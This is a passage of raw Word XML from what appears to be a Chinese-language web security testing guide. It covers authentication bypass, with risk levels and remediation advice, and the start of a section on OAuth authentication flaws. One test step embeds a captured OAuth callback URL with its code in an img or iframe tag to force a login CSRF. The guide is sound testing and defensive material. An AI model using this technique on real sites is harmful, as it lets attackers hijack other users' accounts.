      <w:r w:rsidR="00327419" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="00327419" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00327419" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞在用户不知情的情况下，利用用户的会话进行敏感操作，从而绕过认证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A7D41" w14:textId="5E634CDC"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t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="008A6C59" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果应用程序在认证上没有做好，可以导致恶意用户或者</w:t>
      </w:r>
      <w:r w:rsidR="007C6AB0" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者绕过认证，访问内部资源，</w:t>
      </w:r>
      <w:r w:rsidR="009F190B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这类漏洞通过防火墙和入侵检测系统很难预防。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E3FDAD"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2F87D899" w14:textId="734370EF" w:rsidR="00757422" w:rsidRPr="00AE2ACC" w:rsidRDefault="00DF69B0"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w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00B24538" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能够登录进入应用系统，且可以进行相关操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1678EC56" w14:textId="2E2A291C" w:rsidR="00DF69B0" w:rsidRPr="00AE2ACC" w:rsidRDefault="00DF69B0" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：能够登录访问进入应用系统，但无法进行相关操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D3E13" w14:textId="1B6463E6" w:rsidR="00757422" w:rsidRPr="00AE2ACC" w:rsidRDefault="00757422" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00EF28A9" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可从以下几个方面预防认证绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08115130" w14:textId="00BDD4FE" w:rsidR="00EF28A9" w:rsidRPr="00AE2ACC" w:rsidRDefault="002D35A5" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于每一个访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都首先</w:t>
      </w:r>
      <w:r w:rsidR="00B51F10" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查是否已经登录（不需要认证的</w:t>
      </w:r>
      <w:r w:rsidR="00B51F10" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00B51F10" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除外，例如，帮助页面、免费下载页面等）</w:t>
      </w:r>
      <w:r w:rsidR="009D29B5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果没有登录，则跳转到登录页面。对于已经登录的用户，在退出的时候或者在会话很长时间处于</w:t>
      </w:r>
      <w:r w:rsidR="009D29B5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>idle</w:t>
      </w:r>
      <w:r w:rsidR="009D29B5" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态的时候，需要保证原来的会话</w:t>
      </w:r>
      <w:r w:rsidR="003A5F62" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被正确的销毁并且不会再被</w:t>
      </w:r>
      <w:r w:rsidR="00203D4A" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重</w:t>
      </w:r>
      <w:r w:rsidR="003A5F62" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C629E71" w14:textId="00C0C229" w:rsidR="00AD38E4" w:rsidRPr="00AE2ACC" w:rsidRDefault="00AD38E4" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规定密码强度要求，防止密码被猜测到。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8433B8" w14:textId="4EFA21FE" w:rsidR="00AD38E4" w:rsidRPr="00AE2ACC" w:rsidRDefault="00AD38E4" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于用户是否已经认证，禁止依赖客户端传过来的参数标识，而应将是否登录的标识保存在服务器端的会话中，当接收到该会话的请求时，从会话保存的状态判断是否登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1DDF4F" w14:textId="233039EC" w:rsidR="00DD3B19" w:rsidRPr="00AE2ACC" w:rsidRDefault="00DD3B19" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一定要使用安全的随机数生成算法，使得</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SessionID</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不可预测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574946C3" w14:textId="027E4A4E" w:rsidR="00757422" w:rsidRDefault="00A50D7F" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于暴力破解攻击，建议在尝试</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次左右失败之后，使用图形验证码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1BC8D1" w14:textId="68926466" w:rsidR="00041170" w:rsidRPr="00AE2ACC" w:rsidRDefault="00041170" w:rsidP="00041170">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9D0B85F" w14:textId="6F0DB404" w:rsidR="00757422" w:rsidRPr="00A82BA3" w:rsidRDefault="00594DBB" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc498434499"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Oauth</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证缺陷</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="1B7B2090" w14:textId="22659E86"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5B215F" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OAuth</w:t>
      </w:r>
      <w:r w:rsidR="005B215F" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个在不提供用户名和密码的情况下，授权第三方应用访问</w:t>
      </w:r>
      <w:r w:rsidR="005B215F" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="000A6827" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源的安全协议</w:t>
      </w:r>
      <w:r w:rsidR="005B215F" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="004C2086" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Oauth</w:t>
      </w:r>
      <w:r w:rsidR="004C2086" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证不完全，可越权登录他人账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9CF75F" w14:textId="408FC501"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r w:rsidR="006965D4" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OAuth</w:t>
      </w:r>
      <w:r w:rsidR="006965D4" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证缺陷具体测试场景如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784CBD00" w14:textId="636034B2" w:rsidR="001D5A96" w:rsidRPr="00AE2ACC" w:rsidRDefault="00F3199B" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始认证过程</w:t>
      </w:r>
      <w:r w:rsidR="009509F1" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从提供商那里得到回调</w:t>
      </w:r>
      <w:r w:rsidR="009509F1" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，获取</w:t>
      </w:r>
      <w:r w:rsidR="009509F1" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="009509F1" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>但</w:t>
      </w:r>
      <w:r w:rsidR="009509F1" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>暂不访问带有</w:t>
      </w:r>
      <w:r w:rsidR="009509F1" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="009509F1" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="009509F1" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="0036326D" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>，如</w:t>
      </w:r>
      <w:r w:rsidR="009509F1" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="001D5A96" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="001D5A96" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>www.xxx</w:t>
      </w:r>
      <w:r w:rsidR="001D5A96" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.com/connect/facebook/?code=AQCOtAVov1Cu316rpqPfs-8nDb-jJEiF7aex9n05e2dq3oiXlDwubVoC8VEGNq10rSkyyFb3wKbtZh6xpgG59FsAMMSjIAr613Ly1usZ47jPqADzbDyVuotFaRiQux3g6Ut84nmAf9j-KEvsX0bEPH_aCekLNJ1QAnjpls0SL9ZSK-yw1wPQWQsBhbfMPNJ_LqI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34893C2D" w14:textId="2AA7E604" w:rsidR="00F3199B" w:rsidRPr="00AE2ACC" w:rsidRDefault="001D5A96" w:rsidP="00AE2ACC">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidR="00F3199B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把它放在</w:t>
      </w:r>
      <w:r w:rsidR="00F3199B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;img src=</w:t>
      </w:r>
      <w:r w:rsidR="00F3199B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00F3199B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00F3199B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00F3199B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00F3199B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="00F3199B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;iframe&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00F3199B" w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签下保存起来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD654AE" w14:textId="0C214E08" w:rsidR="00F3199B" w:rsidRPr="00AE2ACC" w:rsidRDefault="00F3199B" w:rsidP="00521AEF">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CA7E9DE" wp14:editId="060334FE">
            <wp:extent cx="5487035" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="24" name="图片 24" descr="http://image.3001.net/2012/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3001.net/2012/10/13.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9100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B51E2" w14:textId="6B95A1D2" w:rsidR="00F3199B" w:rsidRPr="00AE2ACC" w:rsidRDefault="00F3199B" w:rsidP="00521AEF">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95" w:firstLine="199"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE2ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C390EA" wp14:editId="2F4803B3">
            <wp:extent cx="5487035" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="23" name="图片 23" descr="http://image.3001.net/2012/10/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3001.net/2012/10/Screenshot-2.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9100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12010732" w14:textId="7EDB5D9C" w:rsidR="00F3199B" w:rsidRPr="00AE2ACC" w:rsidRDefault="00F3199B" w:rsidP="00521AEF">
      <w:pPr>
